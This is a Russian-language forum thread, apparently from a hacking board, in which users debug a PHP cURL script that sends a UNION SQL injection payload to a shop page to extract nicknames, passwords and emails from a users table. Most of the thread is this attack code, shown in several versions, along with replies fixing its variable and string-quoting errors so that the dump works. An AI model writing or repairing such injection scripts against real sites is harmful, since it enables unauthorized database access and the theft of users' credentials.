День добрый (надеюсь).Такая вот канитель: PHP: <?php $url = 'http://www.site.com/shop.php?st=2&movie=$request&id=676'; $limit = 0; $ref = 'http://www.site.com/shop.php'; $request = '-1306 union select concat_ws(0x3a,Nickname,Password,Email),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from Portal.users limit+0,1/*'; $ua = 'Fuck all!!!'; $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_REFERER,$ref); curl_setopt($ch,CURLOPT_HEADER,1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_USERAGENT,$ua); curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,3); curl_setopt($ch,CURLOPT_COOKIEJAR,'./fuck'); curl_setopt($ch,CURLOPT_COOKIEFILE,'./fuck'); $result = curl_exec($ch); curl_close($ch); echo $result; ?> Вроде посылаю правильно(опять-таки надеюсь).В чём может быть причина ? Проблем с получением самой страницы не возникает,но вот сам результат запроса(а он верный,уверяю вас,господа ))) ).Два варианта: либо я передал неправильно(GET запрос всё же),либо что-то ещё. ЗЫ: Самого результат SQL запроса из бд в ответе невидно ЗЫ2: Веля не тупой... Веля гуглил!(
вопще переменную , которая где то используется, нужно объявлять раньше того места PHP: <?php $request = '-1306 union select concat_ws(0x3a,Nickname,Password,Email),2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25 from Portal.users limit+0,1/*'; $url = 'http://www.site.com/shop.php?st=2&movie=$request&id=676'; $limit = 0; $ref = 'http://www.site.com/shop.php'; $ua = 'Fuck all!!!'; $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_REFERER,$ref); curl_setopt($ch,CURLOPT_HEADER,1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_USERAGENT,$ua); curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,3); curl_setopt($ch,CURLOPT_COOKIEJAR,'./fuck'); curl_setopt($ch,CURLOPT_COOKIEFILE,'./fuck'); $result = curl_exec($ch); curl_close($ch); echo $result; ?>
PHP: $url = 'http://www.site.com/shop.php?st=2&movie=$request&id=676'; $limit = 0; $ref = 'http://www.site.com/shop.php'; $request = '-1306 union select concat_ws(0x3a,Nickname,Password,Email),2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25 from Portal.users limit+0,1/*'; Ну и на что ты надеешся? Одинарные скобки, переменная, которая объявлена позже ее вызова .. PHP: $request = '-1306 union select concat_ws(0x3a,Nickname,Password,Email),2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from Portal.users limit+0,1/*'; $url = 'http://www.site.com/shop.php?st=2&movie='.$request.'&id=676'; $limit = 0; $ref = 'http://www.site.com/shop.php';
PHP: $url = 'http://www.site.com/shop.php?st=2&movie=-1306 union select concat_ws(0x3a,Nickname,Password,Email),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from Portal.User limit 0,1/*&id=676'; $ref = 'http://www.site.com/shop.php'; $ua = 'Fuck you!!!'; $ch = curl_init(); ...Тут код курлы... CURLOPT_POSTFIELDS Убрал,так как данные гет.Зато теперь на экране красуется бэд рекьюст)